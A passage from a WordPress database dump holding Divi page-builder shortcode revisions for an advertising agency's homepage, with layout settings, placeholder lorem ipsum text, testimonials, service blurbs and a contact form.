animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:16:31','2020-08-07 20:16:31','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(603,1,'2020-08-07 20:17:06','2020-08-07 20:17:06','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" 